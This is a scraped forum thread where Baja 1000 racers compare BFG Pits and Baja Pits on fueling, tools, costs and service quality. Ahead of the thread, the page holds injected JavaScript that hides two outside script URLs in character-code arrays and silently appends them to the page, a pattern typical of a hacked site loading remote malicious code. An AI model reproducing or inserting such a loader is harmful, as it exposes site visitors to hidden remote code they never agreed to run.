var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 110, 112, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Baja Pits/BFG Pits - VW Baja Bug Off Road Dezert Racing

Baja Pits/BFG Pits

More
5 years 9 months ago #18380 by psiruss15
psiruss15 created the topic: Baja Pits/BFG Pits
Can't seem to find anywhere what is included if you pit with Baja Pits...BFG appears to be free if you register with them and run BFG's...but I can't seem to find out what you get.

Can anyone recommend one over the other? or both?

Are there mechanics at the pits? Will we have access to tools? etc?

Any advice is always appreciated. I know I am a long ways out from Nov. Just trying to budget out the year.

Baja 1000 2013 or Bust
Gluttons for Punishment

Please Log in or Create an account to join the conversation.

More
5 years 9 months ago #18385 by porboy
porboy replied the topic: Re: Baja Pits/BFG Pits
In the past we have used BFG for our main pits. They have tools and basic supplies such as oils, scrap metal and nuts and bolts and all the tools you may need (welders grinders saws, etc.) BFG is a free service as long as you run their tires. You must sign up before the race and spots are limited. You coordinate with your fuel supplier to deliver the amount of fuel you may need at each pit (ie 15 gallons pit 1, 12 gallons pit 2 etc.) BFG then fuels you and you pay for only the fuel you use which BFG tracks. You will pay a delivery fee for the total amount of fuel you tell them to bring down for you(like a buck a gallon or something like that). BFG also provides you with an awesome pit book with access notes for the course and various maps and course notes. Before the race you attend the BFG pit meeting and at this meeting you bring the supplies you want at each pit (tires, lightbars, jackets, etc.) and you drop them off directly with the pit vehicle that will be at that particular pit. BFG will have waters and snacks if memory serves me correctly. Another great feature of the BFG pits is the use of their radio relay. BFG has a great radio network in BAJA and provides a "Weatherman" type service for it's customers.

We would then sign up with BAJA pits for their emergency only plan which is usually between $200-$300. This plan gives you access to all Baja Pits in the event you need them. There are usually more Baja pits then BFG so this plan gave us great coverage during the race. They have basic tools and people to work on your stuff. The welders may be old and possibly stick welders but they will be able to stick some metal together. They will usually have various fluids and general repair supplies. This plan does not involve any fueling.

Baja pits has a full service plan as well which whould involve fueling. Fuel delivery would wrok in a similar fashion to BFG. I have never used this option and know some people have had issues in regards to the fuel service they provide.

Hope this helps.

<strong>Jason Gutzmer
#1130</strong>
The following user(s) said Thank You: psiruss15

More
5 years 9 months ago - 5 years 9 months ago #18396 by psiruss15
psiruss15 replied the topic: Re: Baja Pits/BFG Pits
Thank you very much.

Baja 1000 2013 or Bust
Gluttons for Punishment
Last Edit: 5 years 9 months ago by psiruss15.

More
5 years 9 months ago #18425 by ronjon
ronjon replied the topic: Re: Baja Pits/BFG Pits
I second what Porboy said. We've used Baja Pits full service and the emergency service.

The challenge with any pit service is if you have them do fuel, you have to break it down into dump cans for each location (technically, that's not a problem, just an expense of buying a bunch of dump cans).

We switched to doing our own fueling from our chase trucks in 2009 and will do that again in 2013. We have used Baja Pits emergency service and while their equipment is varied, it always worked for us and the guys at the pits would help us get repairs done. They'd also refill camelbaks and give us energy bars. I could not convince them to give me a neck massage.

As I said for 2013 we'll be using their emergency service (around $300 and do fueling from our trucks. Apparently Baja Pits is taking some heat over on Race Dezert, but I stand by them. Carlos, the guy who runs it, likes us 11s.

2011 - VORRA Class Champions. 2012 - First loser.
http://www.desertdingo.com
The following user(s) said Thank You: psiruss15

More
5 years 9 months ago #18464 by Rooster
Rooster replied the topic: Re: Baja Pits/BFG Pits
I have worked for Baja Pits and used BFG. BFG is the better deal because they are free! But space is limited and BFG tires are required. Baja Pits has almost twice as many pit stops but because they are not subsidized by a major corporation as a write off they don't have as fancy of pits. The ideal set up is BFG as a main pit and the emergency plan from Baja Pits. Carlos at Baja Pits is a strong supporter or Class 11, 5, 9, etc. He has been at it for quite a while for reasons other than the "incredible money and fame" of desert racing. Most all pits at either should have the fuel you paid for and tires or equipment you dropped off at the designated pits. What have people been saying on Race Dezert?

More
4 years 11 months ago #19252 by EnseNADAslim
EnseNADAslim replied the topic: Baja Pits/BFG Pits
From what I heard at a BFG pit meeting is that you need to be registered and run with BFG's for a complete year before you can receive free pit service. Being our first year (haha,,the Baja 1000, first race---what are we thinking) we'll be using Baja Pits, and man,,,,7.00x15's BFG Super Trax run at about $200.00+ per tire. And still would remain the question??? Pitting the car, paying for pits and and investment of well over $1000.00 just in front tires.
We'll eventually invest in our own dump cans and do our own fueling as well.
I must say however,,,that book that BFG prepares for it's users is fantastic, detailed, maps, and accurate. A great aid to the chase teams.

More
4 years 11 months ago #19253 by Weasel
Weasel replied the topic: Baja Pits/BFG Pits
I my opinion the chase/race note book is worth it. GPS, plus, by the old sign that was hit last week, left at the burned out truck... It makes it much easier to find things in the dark. We never had to find anyone in the daylight., why is that?

More
4 years 10 months ago #19261 by paulfrenchy
paulfrenchy replied the topic: Baja Pits/BFG Pits
I have worked for many years with Baja Pits, and have pitted with BFG pits. Baja Pits was a better option!

When we used BFG pits, they didn't care about their racers and they even closed down the pit and wouldn't give us our fuel that we had already paid for because we were "too late". Also ther pit much slower because you have to fill then move forward and change so a bit can take over 15 mins, which when you add it up isn't good! Also, BFG does not have many pits and not in remote locations.

Baja pits is much more helpful! they would give you tires of cars that had already passed and fuel you even if you weren't signed up. They would come and tow you out from 20 miles away, and have pits every 40 miles! I would only pit with Baja Pits!

But just my experiences...

PF

PF

More
4 years 10 months ago #19262 by Rooster
Rooster replied the topic: Baja Pits/BFG Pits
True that. Carlos and the Baja Pits guys are the best and take special care of all racers, especially class 11! BFG called our car a POS Class 11!

I used to volunteer for Baja Pits before I got a chance to get a sponsor and BP will do ANYTHING they can for a racer in need no matter what.

Here is a trailer for a prerunning video in just am finishing up. Wish us luck in the MAXTRAX Class 11 racer!

Time to create page: 0.189 seconds